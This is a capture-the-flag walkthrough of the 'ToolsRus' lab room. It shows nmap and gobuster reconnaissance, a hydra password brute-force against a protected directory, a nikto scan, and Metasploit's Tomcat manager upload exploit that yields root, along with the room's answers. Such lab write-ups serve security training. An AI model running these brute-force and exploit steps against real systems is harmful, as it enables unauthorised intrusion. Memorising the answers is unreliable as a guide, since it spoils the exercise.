ToolsRus

Reconnaissance
Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)
nmap -Pn 10.10.217.167

Detailed Nmap Scan :
Command Breakdown:
(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 22,80,1234,8009
(-oN nmap): Saving it into a files called nmap
nmap -sV -sC -p 22,80,1234,8009 -oN nmap 10.10.217.167

Enumeration
Port 80
Lets visit the site

It says that the other parts of the website are still functional so lets run gobuster to find hidden directories.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.217.167

We found two directories, lets first visit /guidelines
, which also happens to be the answer to the first question of this room.


Looks like we have a possible username which is bob
. This is the answer to the second question in this room.

Now lets look at the other directory /protected
. This is the answer to question 3 in this room


Its asking us for a password, we have bob as a username, so lets use hydra
to bruteforce the password.
hydra -l bob -P /usr/share/wordlists/rockyou.txt 10.10.217.167 http-get /protected/

We found the password bubbles
which is also the answer to the 4th question in this room

Now we can login

Oh, so now we have to go to the other http port which is 1234 that we saw in the nmap scan, which is also the answer to the 5th question in this room.

Lets visit the site.

Its running Apache Tomcat/7.0.88
which is the answer to question 6.

The next question is asking us to use nikto
to scan /manager/html
directory on this port

Lets do that.
nikto -h 10.10.217.167:1234/manager/html -id bob:bubbles
Lets also visit the web application on this port and directory, we have to login using the same credentials, this is what it looks after logging in.

The Nikto scan did not give me anything important as far as I know, the answer to question 7 is "5".

The answer to the next two questions can be found in the nmap scan


Exploitation
Lets fire up Metasploit
msfconsole

Now lets search for tomcat
search tomcat

Looking through all the exploits, number 5 and 6 were the only ones that were interesting and exploits, so I tried number 6.
use exploit/multi/http/tomcat_mgr_upload

Lets look at the options and check what we have to provide to Metasploit to exploit the system.

We need to change the following options:
Http Username
Http Password
RHOSTS
RPORT
LHOST
The command to set a value to a parameter
set <Parameter> <Value>

After setting everything up, lets run the exploit
run

Now lets check who we are on the system

And we are root, which is the answer to question 10 in this room. You can also find the last answer in the /root/flag.txt
.

Last updated
Was this helpful?